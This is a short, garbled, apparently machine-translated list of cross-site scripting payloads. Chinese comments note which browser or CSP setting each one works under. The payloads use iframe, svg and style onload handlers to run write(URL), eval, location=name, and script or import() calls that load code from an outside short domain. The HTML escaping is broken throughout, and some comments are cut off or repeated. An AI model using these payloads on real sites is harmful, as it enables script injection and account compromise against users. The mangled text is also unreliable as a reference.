!--如果您控制URL,则仅Safari-->;<;<;iframe/onload=write(URL)>;<;!--如果您控制URL-->;<;<;!--如果您控制URL-->;<;SVG/。!--如果您控制名称,但未启用不安全评估--&>;<;svg/onload=location=name;<;!--只是一个临时脚本-->;<;script/src=//NJ.₨&>;/script&>;<;!--如果您控制窗口名称-->;<;iframe/onload=src=。`';+url)>;<;!--如果页面上的iframe数量不变-->;<;iframe/onload=src=top[0].name+/\NJ.₨?/<;<;!--仅适用于Firefox-->;<;iframe/srcdoc=&34;<;svg>;脚本/href。!--如果页面上的IFRAME数是随机的,如果csp中禁用了不安全的内联,则允许使用外部脚本--如果允许内联样式,则允许样式-->;<;-->;<;iframe/onload=src=contentWindow.name+/\NJ.₨?/>;<;!--/onLoad=-->;<;iframe/srcdoc=";<;script/src=//NJ.₨>;<;/script>;";>;<;!--(Name)>;<;!--如果允许内联样式,则仅Safari-->;<;Style/onLoad=Write(Url)>;<;!--如果允许内联样式,并且在阻止内联样式时可以控制url-->;<;Style/onError=-->;<;style/onload=eval(`';`+URL)>;<;!--(Name)>;<;!--使用外部脚本作为导入,在内部HTML中不起作用,除非Firefox-&<;!--PoC仅适用于HTTPS和Chrome,因为-->;<;svg/onload=import(/\\NJ.₨/)>;<;!--检查Sec-Fetch-Dest Header-->;<;style/onload=import(/\\NJ.₨/)>;<;!--使用外部脚本作为导入,如果允许内联样式则触发。<;!--PoC仅适用于HTTPS和Chrome,因为NJ.₨检查Sec-Fetch-Dest HeaderNJ.₨使用外部脚本作为导入-->;<;!--PoC仅适用于HTTPS和Chrome,因为NJ.₨会检查Sec-Fetch-Dest头--<;iframe/onload=IMPORT(/\\NJ.₨/)>;